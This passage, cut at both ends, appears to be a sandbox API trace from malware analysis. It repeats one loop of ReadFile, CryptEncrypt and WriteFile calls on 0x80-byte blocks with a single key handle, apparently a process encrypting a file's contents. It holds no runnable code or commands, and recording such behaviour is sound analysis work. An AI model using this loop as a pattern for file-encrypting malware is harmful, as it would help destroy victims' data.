pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.299] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.299] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.300] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.301] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.301] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.301] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.302] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.302] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.303] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.303] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.303] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, 